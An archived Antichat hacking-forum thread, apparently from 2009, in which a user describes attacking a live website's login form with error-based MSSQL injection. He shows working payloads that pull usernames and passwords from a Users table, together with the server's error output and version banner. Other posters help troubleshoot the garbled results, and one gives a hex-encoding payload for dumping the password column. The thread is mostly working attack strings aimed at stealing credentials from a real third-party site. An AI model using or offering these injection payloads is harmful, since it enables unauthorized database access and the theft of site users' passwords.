Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   mssql injection (https://forum.antichat.xyz/showthread.php?t=132407)

Moerto 01.08.2009 00:25
mssql injection
 
Привет, у меня проблема с mssql инйэкцию. Я в один сайт нашол "vulnerable" (ньезнаю как ето сказать по руски) логин форму. Я палучил юзернеими и другую информацию от датабази с такие команди:
Код:
' and 1=convert(int, (select top 1...))--
Когда я хачу палучиц парольи с такую методу я палучаю такие парольи - ÅÆÅÆ .
Код:
' and 1=convert(varchar, (select top 1 Password from Users where Username='foundusername'))--
Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'  [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'ª·¨©»¯ ' to a column of data type int.
Парольи можно быть в арабиц енкодинг, я попробовал поменьять бровсер енкодинг и без прогреса. Спасибо.
P.S. Я неоченъ харашо гаварю по руски, извиньице.

Spyder 01.08.2009 00:39
вообще если даже в арабской кодировке пароли то они должны нормально отображаться в браузере
это у всех юзеров так пароли выглядят?

Moerto 01.08.2009 01:24
дa

Ctacok 01.08.2009 06:39
Цитата:
Сообщение от Spyder
вообще если даже в арабской кодировке пароли то они должны нормально отображаться в браузере
это у всех юзеров так пароли выглядят?
Кстати часто очень бывает что абра кадабра вылазиет.
Тот же эллементарный 1' or 1=@@version.
Вроде слов много вылазиет, но абра кадабра.
Может знаешь что в чём проблема? :confused:

Moerto 01.08.2009 19:10
Microsoft SQL Server 2000 -

8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2

(Build 3790: Service Pack 1)

_>SubDeviL<_ 02.08.2009 05:51
select+top+1+sys.fn_varbintohexstr(password)+from+ Users+where+Username="foundusername"

юзай так, тобишь функцию sys.fn_varbintohexstr().


Время: 18:58